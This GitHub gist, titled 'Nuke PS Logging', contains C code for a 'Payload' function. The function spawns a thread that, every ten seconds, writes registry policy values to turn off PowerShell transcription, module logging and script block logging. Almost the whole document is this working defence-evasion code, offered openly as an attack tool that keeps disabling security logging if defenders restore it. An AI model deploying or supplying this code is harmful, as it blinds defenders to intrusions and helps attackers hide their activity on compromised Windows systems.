Skip to content

Instantly share code, notes, and snippets.

@leechristensen
Created March 17, 2017 09:20
Show Gist options
  • Save leechristensen/918edb5e394cd4919666867821c0c50e to your computer and use it in GitHub Desktop.
Save leechristensen/918edb5e394cd4919666867821c0c50e to your computer and use it in GitHub Desktop.
Nuke PS Logging
void Payload() {
DWORD threadId;
CreateThread(
NULL, // default security attributes
0, // use default stack size
MyThreadFunction, // thread function name
NULL, // argument to thread function
0, // use default creation flags
&threadId);
}
DWORD WINAPI MyThreadFunction(LPVOID lpParam) {
HKEY hKey;
LPCSTR sKeyPath;
int iResult;
DWORD value = 0x00000000;
while (TRUE) {
sKeyPath = "SOFTWARE\\Wow6432Node\\Policies\\Microsoft\\Windows\\PowerShell\\Transcription";
iResult = RegOpenKeyEx(HKEY_LOCAL_MACHINE, sKeyPath, NULL, KEY_ALL_ACCESS | KEY_WOW64_64KEY, &hKey);
if (iResult == ERROR_SUCCESS) {
if (ERROR_SUCCESS != RegSetValueEx(hKey,
TEXT("EnableTranscripting"),
NULL,
REG_DWORD,
(const BYTE*)&value, // Change made here.
sizeof(value))) {
OutputDebugString("Failed to add key");
}
}
else {
printf("Could not open key: %d", iResult);
}
sKeyPath = "SOFTWARE\\Wow6432Node\\Policies\\Microsoft\\Windows\\PowerShell\\ModuleLogging";
iResult = RegOpenKeyEx(HKEY_LOCAL_MACHINE, sKeyPath, NULL, KEY_ALL_ACCESS | KEY_WOW64_64KEY, &hKey);
if (iResult == ERROR_SUCCESS) {
if (ERROR_SUCCESS != RegSetValueEx(hKey,
TEXT("EnableModuleLogging"),
NULL,
REG_DWORD,
(const BYTE*)&value, // Change made here.
sizeof(value))) {
OutputDebugString("Failed to add key");
}
}
else {
printf("Could not open key: %d", iResult);
}
sKeyPath = "SOFTWARE\\Wow6432Node\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging";
iResult = RegOpenKeyEx(HKEY_LOCAL_MACHINE, sKeyPath, NULL, KEY_ALL_ACCESS | KEY_WOW64_64KEY, &hKey);
if (iResult == ERROR_SUCCESS) {
if (ERROR_SUCCESS != RegSetValueEx(hKey,
TEXT("EnableScriptBlockLogging"),
NULL,
REG_DWORD,
(const BYTE*)&value, // Change made here.
sizeof(value))) {
OutputDebugString("Failed to add key");
}
}
else {
printf("Could not open key: %d", iResult);
}
Sleep(10000);
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment